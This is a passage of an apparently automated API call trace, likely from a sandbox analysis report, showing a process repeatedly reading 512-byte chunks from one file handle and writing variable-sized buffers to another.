lpOverlapped=0x0) returned 1 [0023.504] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.505] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.505] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.506] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.506] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.507] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.507] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.507] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.508] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x6e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.508] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.509] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.510] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x98, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.510] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.510] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.511] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.511] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x367, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.512] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.512] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.513] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.513] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.514] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.514] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2aa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.515] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.515] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.516] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.516] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x272, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.516] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.517] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.517] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.526] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x293, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.527] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.527] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2dd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.528] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.528] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.529] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.529] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.530] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.530] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.530] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.531] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.531] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.532] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.532] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.533] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.533] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.534] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x22b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.534] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.535] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.535] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.536] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.536] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.537] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x388, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.537] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.538] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.538] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.539] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.539] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.540] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.540] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.541] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.541] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.542] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.542] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.543] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x385, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.543] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.543] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x308, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.544] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.544] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ee, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.545] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.545] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ec, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.546] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.546] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.547] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.547] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.548] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.548] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.548] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.562] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x313, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.572] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.572] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.573] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.573] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x319, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.574] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.574] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.575] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.575] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.576] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.576] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2aa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.577] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.577] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x311, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.578] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.578] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.579] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.579] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.580] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.580] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.581] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2dd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.581] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.582] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.582] ReadFile (in: hFile=0x2b0, 